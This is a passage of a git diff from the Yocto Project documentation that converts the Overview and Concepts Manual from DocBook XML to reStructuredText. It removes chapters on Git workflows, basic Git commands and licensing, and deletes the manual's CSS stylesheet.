- <ulink url='&YOCTO_GIT_URL;'>Source Repositories</ulink> organized
- within the "Poky Support" area.
- These branches hold changes (commits) to the project that have been
- submitted or committed by the Yocto Project development team and by
- community members who contribute to the project.
- The maintainer determines if the changes are qualified to be moved
- from the "contrib" branches into the "master" branch of the Git
- repository.
- </para>
-
- <para>
- Developers (including contributing community members) create and
- maintain cloned repositories of upstream branches.
- The cloned repositories are local to their development platforms and
- are used to develop changes.
- When a developer is satisfied with a particular feature or change,
- they "push" the change to the appropriate "contrib" repository.
- </para>
-
- <para>
- Developers are responsible for keeping their local repository
- up-to-date with whatever upstream branch they are working against.
- They are also responsible for straightening out any conflicts that
- might arise within files that are being worked on simultaneously by
- more than one person.
- All this work is done locally on the development host before
- anything is pushed to a "contrib" area and examined at the maintainer’s
- level.
- </para>
-
- <para>
- A somewhat formal method exists by which developers commit changes
- and push them into the "contrib" area and subsequently request that
- the maintainer include them into an upstream branch.
- This process is called “submitting a patch†or "submitting a change."
- For information on submitting patches and changes, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#how-to-submit-a-change'>Submitting a Change to the Yocto Project</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para>
-
- <para>
- In summary, a single point of entry
- exists for changes into a "master" or development branch of the
- Git repository, which is controlled by the project’s maintainer.
- And, a set of developers exist who independently develop, test, and
- submit changes to "contrib" areas for the maintainer to examine.
- The maintainer then chooses which changes are going to become a
- permanent part of the project.
- </para>
-
- <para>
- <imagedata fileref="figures/git-workflow.png" width="6in" depth="3in" align="left" scalefit="1" />
- </para>
-
- <para>
- While each development environment is unique, there are some best
- practices or methods that help development run smoothly.
- The following list describes some of these practices.
- For more information about Git workflows, see the workflow topics in
- the
- <ulink url='http://book.git-scm.com'>Git Community Book</ulink>.
- <itemizedlist>
- <listitem><para>
- <emphasis>Make Small Changes:</emphasis>
- It is best to keep the changes you commit small as compared to
- bundling many disparate changes into a single commit.
- This practice not only keeps things manageable but also allows
- the maintainer to more easily include or refuse changes.
- </para></listitem>
- <listitem><para>
- <emphasis>Make Complete Changes:</emphasis>
- It is also good practice to leave the repository in a
- state that allows you to still successfully build your project.
- In other words, do not commit half of a feature,
- then add the other half as a separate, later commit.
- Each commit should take you from one buildable project state
- to another buildable state.
- </para></listitem>
- <listitem><para>
- <emphasis>Use Branches Liberally:</emphasis>
- It is very easy to create, use, and delete local branches in
- your working Git repository on the development host.
- You can name these branches anything you like.
- It is helpful to give them names associated with the particular
- feature or change on which you are working.
- Once you are done with a feature or change and have merged it
- into your local master branch, simply discard the temporary
- branch.
- </para></listitem>
- <listitem><para>
- <emphasis>Merge Changes:</emphasis>
- The <filename>git merge</filename> command allows you to take
- the changes from one branch and fold them into another branch.
- This process is especially helpful when more than a single
- developer might be working on different parts of the same
- feature.
- Merging changes also automatically identifies any collisions
- or "conflicts" that might happen as a result of the same lines
- of code being altered by two different developers.
- </para></listitem>
- <listitem><para>
- <emphasis>Manage Branches:</emphasis>
- Because branches are easy to use, you should use a system
- where branches indicate varying levels of code readiness.
- For example, you can have a "work" branch to develop in, a
- "test" branch where the code or change is tested, a "stage"
- branch where changes are ready to be committed, and so forth.
- As your project develops, you can merge code across the
- branches to reflect ever-increasing stable states of the
- development.
- </para></listitem>
- <listitem><para>
- <emphasis>Use Push and Pull:</emphasis>
- The push-pull workflow is based on the concept of developers
- "pushing" local commits to a remote repository, which is
- usually a contribution repository.
- This workflow is also based on developers "pulling" known
- states of the project down into their local development
- repositories.
- The workflow easily allows you to pull changes submitted by
- other developers from the upstream repository into your
- work area ensuring that you have the most recent software
- on which to develop.
- The Yocto Project has two scripts named
- <filename>create-pull-request</filename> and
- <filename>send-pull-request</filename> that ship with the
- release to facilitate this workflow.
- You can find these scripts in the <filename>scripts</filename>
- folder of the
- <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>.
- For information on how to use these scripts, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#pushing-a-change-upstream'>Using Scripts to Push a Change Upstream and Request a Pull</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para></listitem>
- <listitem><para>
- <emphasis>Patch Workflow:</emphasis>
- This workflow allows you to notify the maintainer through an
- email that you have a change (or patch) you would like
- considered for the "master" branch of the Git repository.
- To send this type of change, you format the patch and then
- send the email using the Git commands
- <filename>git format-patch</filename> and
- <filename>git send-email</filename>.
- For information on how to use these scripts, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#how-to-submit-a-change'>Submitting a Change to the Yocto Project</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para></listitem>
- </itemizedlist>
- </para>
-</section>
-
-<section id='git'>
- <title>Git</title>
-
- <para>
- The Yocto Project makes extensive use of Git, which is a
- free, open source distributed version control system.
- Git supports distributed development, non-linear development,
- and can handle large projects.
- It is best that you have some fundamental understanding
- of how Git tracks projects and how to work with Git if
- you are going to use the Yocto Project for development.
- This section provides a quick overview of how Git works and
- provides you with a summary of some essential Git commands.
- <note><title>Notes</title>
- <itemizedlist>
- <listitem><para>
- For more information on Git, see
- <ulink url='http://git-scm.com/documentation'></ulink>.
- </para></listitem>
- <listitem><para>
- If you need to download Git, it is recommended that you add
- Git to your system through your distribution's "software
- store" (e.g. for Ubuntu, use the Ubuntu Software feature).
- For the Git download page, see
- <ulink url='http://git-scm.com/download'></ulink>.
- </para></listitem>
- <listitem><para>
- For information beyond the introductory nature in this
- section, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#locating-yocto-project-source-files'>Locating Yocto Project Source Files</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para></listitem>
- </itemizedlist>
- </note>
- </para>
-
- <section id='repositories-tags-and-branches'>
- <title>Repositories, Tags, and Branches</title>
-
- <para>
- As mentioned briefly in the previous section and also in the
- "<link linkend='gs-git-workflows-and-the-yocto-project'>Git Workflows and the Yocto Project</link>"
- section, the Yocto Project maintains source repositories at
- <ulink url='&YOCTO_GIT_URL;'></ulink>.
- If you look at this web-interface of the repositories, each item
- is a separate Git repository.
- </para>
-
- <para>
- Git repositories use branching techniques that track content
- change (not files) within a project (e.g. a new feature or updated
- documentation).
- Creating a tree-like structure based on project divergence allows
- for excellent historical information over the life of a project.
- This methodology also allows for an environment from which you can
- do lots of local experimentation on projects as you develop
- changes or new features.
- </para>
-
- <para>
- A Git repository represents all development efforts for a given
- project.
- For example, the Git repository <filename>poky</filename> contains
- all changes and developments for that repository over the course
- of its entire life.
- That means that all changes that make up all releases are captured.
- The repository maintains a complete history of changes.
- </para>
-
- <para>
- You can create a local copy of any repository by "cloning" it
- with the <filename>git clone</filename> command.
- When you clone a Git repository, you end up with an identical
- copy of the repository on your development system.
- Once you have a local copy of a repository, you can take steps to
- develop locally.
- For examples on how to clone Git repositories, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#locating-yocto-project-source-files'>Locating Yocto Project Source Files</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para>
-
- <para>
- It is important to understand that Git tracks content change and
- not files.
- Git uses "branches" to organize different development efforts.
- For example, the <filename>poky</filename> repository has
- several branches that include the current "&DISTRO_NAME_NO_CAP;"
- branch, the "master" branch, and many branches for past
- Yocto Project releases.
- You can see all the branches by going to
- <ulink url='&YOCTO_GIT_URL;/cgit.cgi/poky/'></ulink> and
- clicking on the
- <filename><ulink url='&YOCTO_GIT_URL;/cgit.cgi/poky/refs/heads'>[...]</ulink></filename>
- link beneath the "Branch" heading.
- </para>
-
- <para>
- Each of these branches represents a specific area of development.
- The "master" branch represents the current or most recent
- development.
- All other branches represent offshoots of the "master" branch.
- </para>
-
- <para>
- When you create a local copy of a Git repository, the copy has
- the same set of branches as the original.
- This means you can use Git to create a local working area
- (also called a branch) that tracks a specific development branch
- from the upstream source Git repository.
- in other words, you can define your local Git environment to
- work on any development branch in the repository.
- To help illustrate, consider the following example Git commands:
- <literallayout class='monospaced'>
- $ cd ~
- $ git clone git://git.yoctoproject.org/poky
- $ cd poky
- $ git checkout -b &DISTRO_NAME_NO_CAP; origin/&DISTRO_NAME_NO_CAP;
- </literallayout>
- In the previous example after moving to the home directory, the
- <filename>git clone</filename> command creates a
- local copy of the upstream <filename>poky</filename> Git repository.
- By default, Git checks out the "master" branch for your work.
- After changing the working directory to the new local repository
- (i.e. <filename>poky</filename>), the
- <filename>git checkout</filename> command creates
- and checks out a local branch named "&DISTRO_NAME_NO_CAP;", which
- tracks the upstream "origin/&DISTRO_NAME_NO_CAP;" branch.
- Changes you make while in this branch would ultimately affect
- the upstream "&DISTRO_NAME_NO_CAP;" branch of the
- <filename>poky</filename> repository.
- </para>
-
- <para>
- It is important to understand that when you create and checkout a
- local working branch based on a branch name,
- your local environment matches the "tip" of that particular
- development branch at the time you created your local branch,
- which could be different from the files in the "master" branch
- of the upstream repository.
- In other words, creating and checking out a local branch based on
- the "&DISTRO_NAME_NO_CAP;" branch name is not the same as
- checking out the "master" branch in the repository.
- Keep reading to see how you create a local snapshot of a Yocto
- Project Release.
- </para>
-
- <para>
- Git uses "tags" to mark specific changes in a repository branch
- structure.
- Typically, a tag is used to mark a special point such as the final
- change (or commit) before a project is released.
- You can see the tags used with the <filename>poky</filename> Git
- repository by going to
- <ulink url='&YOCTO_GIT_URL;/cgit.cgi/poky/'></ulink> and
- clicking on the
- <filename><ulink url='&YOCTO_GIT_URL;/cgit.cgi/poky/refs/tags'>[...]</ulink></filename>
- link beneath the "Tag" heading.
- </para>
-
- <para>
- Some key tags for the <filename>poky</filename> repository are
- <filename>jethro-14.0.3</filename>,
- <filename>morty-16.0.1</filename>,
- <filename>pyro-17.0.0</filename>, and
- <filename>&DISTRO_NAME_NO_CAP;-&POKYVERSION;</filename>.
- These tags represent Yocto Project releases.
- </para>
-
- <para>
- When you create a local copy of the Git repository, you also
- have access to all the tags in the upstream repository.
- Similar to branches, you can create and checkout a local working
- Git branch based on a tag name.
- When you do this, you get a snapshot of the Git repository that
- reflects the state of the files when the change was made associated
- with that tag.
- The most common use is to checkout a working branch that matches
- a specific Yocto Project release.
- Here is an example:
- <literallayout class='monospaced'>
- $ cd ~
- $ git clone git://git.yoctoproject.org/poky
- $ cd poky
- $ git fetch --tags
- $ git checkout tags/rocko-18.0.0 -b my_rocko-18.0.0
- </literallayout>
- In this example, the name of the top-level directory of your
- local Yocto Project repository is <filename>poky</filename>.
- After moving to the <filename>poky</filename> directory, the
- <filename>git fetch</filename> command makes all the upstream
- tags available locally in your repository.
- Finally, the <filename>git checkout</filename> command
- creates and checks out a branch named "my-rocko-18.0.0" that is
- based on the upstream branch whose "HEAD" matches the
- commit in the repository associated with the "rocko-18.0.0" tag.
- The files in your repository now exactly match that particular
- Yocto Project release as it is tagged in the upstream Git
- repository.
- It is important to understand that when you create and
- checkout a local working branch based on a tag, your environment
- matches a specific point in time and not the entire development
- branch (i.e. from the "tip" of the branch backwards).
- </para>
- </section>
-
- <section id='basic-commands'>
- <title>Basic Commands</title>
-
- <para>
- Git has an extensive set of commands that lets you manage changes
- and perform collaboration over the life of a project.
- Conveniently though, you can manage with a small set of basic
- operations and workflows once you understand the basic
- philosophy behind Git.
- You do not have to be an expert in Git to be functional.
- A good place to look for instruction on a minimal set of Git
- commands is
- <ulink url='http://git-scm.com/documentation'>here</ulink>.
- </para>
-
- <para>
- The following list of Git commands briefly describes some basic
- Git operations as a way to get started.
- As with any set of commands, this list (in most cases) simply shows
- the base command and omits the many arguments it supports.
- See the Git documentation for complete descriptions and strategies
- on how to use these commands:
- <itemizedlist>
- <listitem><para>
- <emphasis><filename>git init</filename>:</emphasis>
- Initializes an empty Git repository.
- You cannot use Git commands unless you have a
- <filename>.git</filename> repository.
- </para></listitem>
- <listitem><para id='git-commands-clone'>
- <emphasis><filename>git clone</filename>:</emphasis>
- Creates a local clone of a Git repository that is on
- equal footing with a fellow developer’s Git repository
- or an upstream repository.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>git add</filename>:</emphasis>
- Locally stages updated file contents to the index that
- Git uses to track changes.
- You must stage all files that have changed before you
- can commit them.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>git commit</filename>:</emphasis>
- Creates a local "commit" that documents the changes you
- made.
- Only changes that have been staged can be committed.
- Commits are used for historical purposes, for determining
- if a maintainer of a project will allow the change,
- and for ultimately pushing the change from your local
- Git repository into the project’s upstream repository.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>git status</filename>:</emphasis>
- Reports any modified files that possibly need to be
- staged and gives you a status of where you stand regarding
- local commits as compared to the upstream repository.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>git checkout</filename> <replaceable>branch-name</replaceable>:</emphasis>
- Changes your local working branch and in this form
- assumes the local branch already exists.
- This command is analogous to "cd".
- </para></listitem>
- <listitem><para>
- <emphasis><filename>git checkout –b</filename> <replaceable>working-branch</replaceable> <replaceable>upstream-branch</replaceable>:</emphasis>
- Creates and checks out a working branch on your local
- machine.
- The local branch tracks the upstream branch.
- You can use your local branch to isolate your work.
- It is a good idea to use local branches when adding
- specific features or changes.
- Using isolated branches facilitates easy removal of
- changes if they do not work out.
- </para></listitem>
- <listitem><para><emphasis><filename>git branch</filename>:</emphasis>
- Displays the existing local branches associated with your
- local repository.
- The branch that you have currently checked out is noted
- with an asterisk character.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>git branch -D</filename> <replaceable>branch-name</replaceable>:</emphasis>
- Deletes an existing local branch.
- You need to be in a local branch other than the one you
- are deleting in order to delete
- <replaceable>branch-name</replaceable>.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>git pull --rebase</filename>:</emphasis>
- Retrieves information from an upstream Git repository
- and places it in your local Git repository.
- You use this command to make sure you are synchronized with
- the repository from which you are basing changes
- (.e.g. the "master" branch).
- The "--rebase" option ensures that any local commits you
- have in your branch are preserved at the top of your
- local branch.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>git push</filename> <replaceable>repo-name</replaceable> <replaceable>local-branch</replaceable><filename>:</filename><replaceable>upstream-branch</replaceable>:</emphasis>
- Sends all your committed local changes to the upstream Git
- repository that your local repository is tracking
- (e.g. a contribution repository).
- The maintainer of the project draws from these repositories
- to merge changes (commits) into the appropriate branch
- of project's upstream repository.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>git merge</filename>:</emphasis>
- Combines or adds changes from one
- local branch of your repository with another branch.
- When you create a local Git repository, the default branch
- is named "master".
- A typical workflow is to create a temporary branch that is
- based off "master" that you would use for isolated work.
- You would make your changes in that isolated branch,
- stage and commit them locally, switch to the "master"
- branch, and then use the <filename>git merge</filename>
- command to apply the changes from your isolated branch
- into the currently checked out branch (e.g. "master").
- After the merge is complete and if you are done with
- working in that isolated branch, you can safely delete
- the isolated branch.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>git cherry-pick</filename> <replaceable>commits</replaceable>:</emphasis>
- Choose and apply specific commits from one branch
- into another branch.
- There are times when you might not be able to merge
- all the changes in one branch with
- another but need to pick out certain ones.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>gitk</filename>:</emphasis>
- Provides a GUI view of the branches and changes in your
- local Git repository.
- This command is a good way to graphically see where things
- have diverged in your local repository.
- <note>
- You need to install the <filename>gitk</filename>
- package on your development system to use this
- command.
- </note>
- </para></listitem>
- <listitem><para>
- <emphasis><filename>git log</filename>:</emphasis>
- Reports a history of your commits to the repository.
- This report lists all commits regardless of whether you
- have pushed them upstream or not.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>git diff</filename>:</emphasis>
- Displays line-by-line differences between a local
- working file and the same file as understood by Git.
- This command is useful to see what you have changed
- in any given file.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-</section>
-
-<section id='licensing'>
- <title>Licensing</title>
-
- <para>
- Because open source projects are open to the public, they have
- different licensing structures in place.
- License evolution for both Open Source and Free Software has an
- interesting history.
- If you are interested in this history, you can find basic information
- here:
- <itemizedlist>
- <listitem><para>
- <ulink url='http://en.wikipedia.org/wiki/Open-source_license'>Open source license history</ulink>
- </para></listitem>
- <listitem><para>
- <ulink url='http://en.wikipedia.org/wiki/Free_software_license'>Free software license history</ulink>
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- In general, the Yocto Project is broadly licensed under the
- Massachusetts Institute of Technology (MIT) License.
- MIT licensing permits the reuse of software within proprietary
- software as long as the license is distributed with that software.
- MIT is also compatible with the GNU General Public License (GPL).
- Patches to the Yocto Project follow the upstream licensing scheme.
- You can find information on the MIT license
- <ulink url='http://www.opensource.org/licenses/mit-license.php'>here</ulink>.
- You can find information on the GNU GPL
- <ulink url='http://www.opensource.org/licenses/LGPL-3.0'>here</ulink>.
- </para>
-
- <para>
- When you build an image using the Yocto Project, the build process
- uses a known list of licenses to ensure compliance.
- You can find this list in the
- <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>
- at <filename>meta/files/common-licenses</filename>.
- Once the build completes, the list of all licenses found and used
- during that build are kept in the
- <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>
- at <filename>tmp/deploy/licenses</filename>.
- </para>
-
- <para>
- If a module requires a license that is not in the base list, the
- build process generates a warning during the build.
- These tools make it easier for a developer to be certain of the
- licenses with which their shipped products must comply.
- However, even with these tools it is still up to the developer to
- resolve potential licensing issues.
- </para>
-
- <para>
- The base list of licenses used by the build process is a combination
- of the Software Package Data Exchange (SPDX) list and the Open
- Source Initiative (OSI) projects.
- <ulink url='http://spdx.org'>SPDX Group</ulink> is a working group of
- the Linux Foundation that maintains a specification for a standard
- format for communicating the components, licenses, and copyrights
- associated with a software package.
- <ulink url='http://opensource.org'>OSI</ulink> is a corporation
- dedicated to the Open Source Definition and the effort for reviewing
- and approving licenses that conform to the Open Source Definition
- (OSD).
- </para>
-
- <para>
- You can find a list of the combined SPDX and OSI licenses that the
- Yocto Project uses in the
- <filename>meta/files/common-licenses</filename> directory in your
- <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>.
- </para>
-
- <para>
- For information that can help you maintain compliance with various
- open source licensing during the lifecycle of a product created using
- the Yocto Project, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#maintaining-open-source-license-compliance-during-your-products-lifecycle'>Maintaining Open Source License Compliance During Your Product's Lifecycle</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para>
-</section>
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/overview-manual/overview-manual-intro.rst b/documentation/overview-manual/overview-manual-intro.rst
new file mode 100644
index 0000000000..8885eb89ff
--- /dev/null
+++ b/documentation/overview-manual/overview-manual-intro.rst
@@ -0,0 +1,74 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+**********************************************
+The Yocto Project Overview and Concepts Manual
+**********************************************
+
+.. _overview-manual-welcome:
+
+Welcome
+=======
+
+Welcome to the Yocto Project Overview and Concepts Manual! This manual
+introduces the Yocto Project by providing concepts, software overviews,
+best-known-methods (BKMs), and any other high-level introductory
+information suitable for a new Yocto Project user.
+
+The following list describes what you can get from this manual:
+
+- `Introducing the Yocto Project <#overview-yp>`__\ *:* This chapter
+ provides an introduction to the Yocto Project. You will learn about
+ features and challenges of the Yocto Project, the layer model,
+ components and tools, development methods, the
+ :term:`Poky` reference distribution, the
+ OpenEmbedded build system workflow, and some basic Yocto terms.
+
+- `The Yocto Project Development
+ Environment <#overview-development-environment>`__\ *:* This chapter
+ helps you get started understanding the Yocto Project development
+ environment. You will learn about open source, development hosts,
+ Yocto Project source repositories, workflows using Git and the Yocto
+ Project, a Git primer, and information about licensing.
+
+- :doc:`overview-manual-concepts` *:* This
+ chapter presents various concepts regarding the Yocto Project. You
+ can find conceptual information about components, development,
+ cross-toolchains, and so forth.
+
+This manual does not give you the following:
+
+- *Step-by-step Instructions for Development Tasks:* Instructional
+ procedures reside in other manuals within the Yocto Project
+ documentation set. For example, the :doc:`../dev-manual/dev-manual`
+ provides examples on how to perform
+ various development tasks. As another example, the
+ :doc:`../sdk-manual/sdk-manual` manual contains detailed
+ instructions on how to install an SDK, which is used to develop
+ applications for target hardware.
+
+- *Reference Material:* This type of material resides in an appropriate
+ reference manual. For example, system variables are documented in the
+ :doc:`../ref-manual/ref-manual`. As another
+ example, the :doc:`../bsp-guide/bsp-guide` contains reference information on
+ BSPs.
+
+- *Detailed Public Information Not Specific to the Yocto Project:* For
+ example, exhaustive information on how to use the Source Control
+ Manager Git is better covered with Internet searches and official Git
+ Documentation than through the Yocto Project documentation.
+
+.. _overview-manual-other-information:
+
+Other Information
+=================
+
+Because this manual presents information for many different topics,
+supplemental information is recommended for full comprehension. For
+additional introductory information on the Yocto Project, see the
+:yocto_home:`Yocto Project Website <>`. If you want to build an image
+with no knowledge of Yocto Project as a way of quickly testing it out,
+see the :doc:`../brief-yoctoprojectqs/brief-yoctoprojectqs` document.
+For a comprehensive list of links and other documentation, see the
+":ref:`Links and Related
+Documentation <resources-links-and-related-documentation>`"
+section in the Yocto Project Reference Manual.
diff --git a/documentation/overview-manual/overview-manual-intro.xml b/documentation/overview-manual/overview-manual-intro.xml
deleted file mode 100644
index 39433aa41b..0000000000
--- a/documentation/overview-manual/overview-manual-intro.xml
+++ /dev/null
@@ -1,112 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='overview-manual-intro'>
-
-<title>The Yocto Project Overview and Concepts Manual</title>
- <section id='overview-manual-welcome'>
- <title>Welcome</title>
-
- <para>
- Welcome to the Yocto Project Overview and Concepts Manual!
- This manual introduces the Yocto Project by providing concepts,
- software overviews, best-known-methods (BKMs), and any other
- high-level introductory information suitable for a new Yocto
- Project user.
- </para>
-
- <para>
- The following list describes what you can get from this manual:
- <itemizedlist>
- <listitem><para>
- <emphasis><link linkend='overview-yp'>Introducing the Yocto Project</link>:</emphasis>
- This chapter provides an introduction to the Yocto
- Project.
- You will learn about features and challenges of the
- Yocto Project, the layer model, components and tools,
- development methods, the
- <ulink url='&YOCTO_DOCS_REF_URL;#poky'>Poky</ulink>
- reference distribution, the OpenEmbedded build system
- workflow, and some basic Yocto terms.
- </para></listitem>
- <listitem><para>
- <emphasis><link linkend='overview-development-environment'>The Yocto Project Development Environment</link>:</emphasis>
- This chapter helps you get started understanding the
- Yocto Project development environment.
- You will learn about open source, development hosts,
- Yocto Project source repositories, workflows using Git
- and the Yocto Project, a Git primer, and information
- about licensing.
- </para></listitem>
- <listitem><para>
- <emphasis><link linkend='overview-manual-concepts'>Yocto Project Concepts</link>:</emphasis>
- This chapter presents various concepts regarding the
- Yocto Project.
- You can find conceptual information about components,
- development, cross-toolchains, and so forth.
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- This manual does not give you the following:
- <itemizedlist>
- <listitem><para>
- <emphasis>Step-by-step Instructions for Development Tasks:</emphasis>
- Instructional procedures reside in other manuals within
- the Yocto Project documentation set.
- For example, the
- <ulink url='&YOCTO_DOCS_DEV_URL;'>Yocto Project Development Tasks Manual</ulink>
- provides examples on how to perform various development
- tasks.
- As another example, the
- <ulink url='&YOCTO_DOCS_SDK_URL;'>Yocto Project Application Development and the Extensible Software Development Kit (eSDK)</ulink>
- manual contains detailed instructions on how to install an
- SDK, which is used to develop applications for target
- hardware.
- </para></listitem>
- <listitem><para>
- <emphasis>Reference Material:</emphasis>
- This type of material resides in an appropriate reference
- manual.
- For example, system variables are documented in the
- <ulink url='&YOCTO_DOCS_REF_URL;'>Yocto Project Reference Manual</ulink>.
- As another example, the
- <ulink url='&YOCTO_DOCS_BSP_URL;'>Yocto Project Board Support Package (BSP) Developer's Guide</ulink>
- contains reference information on BSPs.
- </para></listitem>
- <listitem><para>
- <emphasis>Detailed Public Information Not Specific to the
- Yocto Project:</emphasis>
- For example, exhaustive information on how to use the
- Source Control Manager Git is better covered with Internet
- searches and official Git Documentation than through the
- Yocto Project documentation.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='overview-manual-other-information'>
- <title>Other Information</title>
-
- <para>
- Because this manual presents information for many different
- topics, supplemental information is recommended for full
- comprehension.
- For additional introductory information on the Yocto Project, see
- the <ulink url='&YOCTO_HOME_URL;'>Yocto Project Website</ulink>.
- If you want to build an image with no knowledge of Yocto Project
- as a way of quickly testing it out, see the
- <ulink url='&YOCTO_DOCS_BRIEF_URL;'>Yocto Project Quick Build</ulink>
- document.
- For a comprehensive list of links and other documentation, see the
- "<ulink url='&YOCTO_DOCS_REF_URL;#resources-links-and-related-documentation'>Links and Related Documentation</ulink>"
- section in the Yocto Project Reference Manual.
- </para>
- </section>
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/overview-manual/overview-manual-style.css b/documentation/overview-manual/overview-manual-style.css
deleted file mode 100644
index 97a364b125..0000000000
--- a/documentation/overview-manual/overview-manual-style.css
+++ /dev/null
@@ -1,988 +0,0 @@
-/*
- Generic XHTML / DocBook XHTML CSS Stylesheet.
-
- Browser wrangling and typographic design by
- Oyvind Kolas / pippin@gimp.org
-
- Customised for Poky by
- Matthew Allum / mallum@o-hand.com
-
- Thanks to:
- Liam R. E. Quin
- William Skaggs
- Jakub Steiner
-
- Structure
- ---------
-
- The stylesheet is divided into the following sections:
-
- Positioning
- Margins, paddings, width, font-size, clearing.
- Decorations
- Borders, style
- Colors
- Colors
- Graphics
- Graphical backgrounds
- Nasty IE tweaks
- Workarounds needed to make it work in internet explorer,
- currently makes the stylesheet non validating, but up until
- this point it is validating.
- Mozilla extensions
- Transparency for footer
- Rounded corners on boxes
-
-*/
-
-
- /*************** /
- / Positioning /
-/ ***************/
-
-body {
- font-family: Verdana, Sans, sans-serif;
-
- min-width: 640px;
- width: 80%;
- margin: 0em auto;
- padding: 2em 5em 5em 5em;
- color: #333;
-}
-
-h1,h2,h3,h4,h5,h6,h7 {
- font-family: Arial, Sans;
- color: #00557D;
- clear: both;
-}
-
-h1 {
- font-size: 2em;
- text-align: left;
- padding: 0em 0em 0em 0em;
- margin: 2em 0em 0em 0em;
-}
-
-h2.subtitle {
- margin: 0.10em 0em 3.0em 0em;
- padding: 0em 0em 0em 0em;
- font-size: 1.8em;
- padding-left: 20%;
- font-weight: normal;
- font-style: italic;
-}
-
-h2 {
- margin: 2em 0em 0.66em 0em;
- padding: 0.5em 0em 0em 0em;
- font-size: 1.5em;
- font-weight: bold;
-}
-
-h3.subtitle {
- margin: 0em 0em 1em 0em;
- padding: 0em 0em 0em 0em;
- font-size: 142.14%;
- text-align: right;
-}
-
-h3 {
- margin: 1em 0em 0.5em 0em;
- padding: 1em 0em 0em 0em;
- font-size: 140%;
- font-weight: bold;
-}
-
-h4 {
- margin: 1em 0em 0.5em 0em;
- padding: 1em 0em 0em 0em;
- font-size: 120%;
- font-weight: bold;
-}
-
-h5 {
- margin: 1em 0em 0.5em 0em;
- padding: 1em 0em 0em 0em;
- font-size: 110%;
- font-weight: bold;
-}
-
-h6 {
- margin: 1em 0em 0em 0em;
- padding: 1em 0em 0em 0em;
- font-size: 110%;
- font-weight: bold;
-}
-
-.authorgroup {
- background-color: transparent;
- background-repeat: no-repeat;
- padding-top: 256px;
- background-image: url("figures/overview-manual-title.png");
- background-position: left top;
- margin-top: -256px;
- padding-right: 50px;
- margin-left: 0px;
- text-align: right;
- width: 740px;
-}
-
-h3.author {
- margin: 0em 0me 0em 0em;
- padding: 0em 0em 0em 0em;
- font-weight: normal;
- font-size: 100%;
- color: #333;
- clear: both;
-}
-
-.author tt.email {
- font-size: 66%;
-}
-
-.titlepage hr {
- width: 0em;
- clear: both;
-}
-
-.revhistory {
- padding-top: 2em;
- clear: both;
-}
-
-.toc,
-.list-of-tables,
-.list-of-examples,
-.list-of-figures {
- padding: 1.33em 0em 2.5em 0em;
- color: #00557D;
-}
-
-.toc p,
-.list-of-tables p,
-.list-of-figures p,
-.list-of-examples p {
- padding: 0em 0em 0em 0em;
- padding: 0em 0em 0.3em;
- margin: 1.5em 0em 0em 0em;
-}
-
-.toc p b,
-.list-of-tables p b,
-.list-of-figures p b,
-.list-of-examples p b{
- font-size: 100.0%;
- font-weight: bold;
-}
-
-.toc dl,
-.list-of-tables dl,
-.list-of-figures dl,
-.list-of-examples dl {
- margin: 0em 0em 0.5em 0em;
- padding: 0em 0em 0em 0em;
-}
-
-.toc dt {
- margin: 0em 0em 0em 0em;
- padding: 0em 0em 0em 0em;
-}
-
-.toc dd {
- margin: 0em 0em 0em 2.6em;
- padding: 0em 0em 0em 0em;
-}
-
-div.glossary dl,
-div.variablelist dl {
-}
-
-.glossary dl dt,
-.variablelist dl dt,
-.variablelist dl dt span.term {
- font-weight: normal;
- width: 20em;
- text-align: right;
-}
-
-.variablelist dl dt {
- margin-top: 0.5em;
-}
-
-.glossary dl dd,
-.variablelist dl dd {
- margin-top: -1em;
- margin-left: 25.5em;
-}
-
-.glossary dd p,
-.variablelist dd p {
- margin-top: 0em;
- margin-bottom: 1em;
-}
-
-
-div.calloutlist table td {
- padding: 0em 0em 0em 0em;
- margin: 0em 0em 0em 0em;
-}
-
-div.calloutlist table td p {
- margin-top: 0em;
- margin-bottom: 1em;
-}
-
-div p.copyright {
- text-align: left;
-}
-
-div.legalnotice p.legalnotice-title {
- margin-bottom: 0em;
-}
-
-p {
- line-height: 1.5em;
- margin-top: 0em;
-
-}
-
-dl {
- padding-top: 0em;
-}
-
-hr {
- border: solid 1px;
-}
-
-
-.mediaobject,
-.mediaobjectco {
- text-align: center;
-}
-
-img {
- border: none;
-}
-
-ul {
- padding: 0em 0em 0em 1.5em;
-}
-
-ul li {
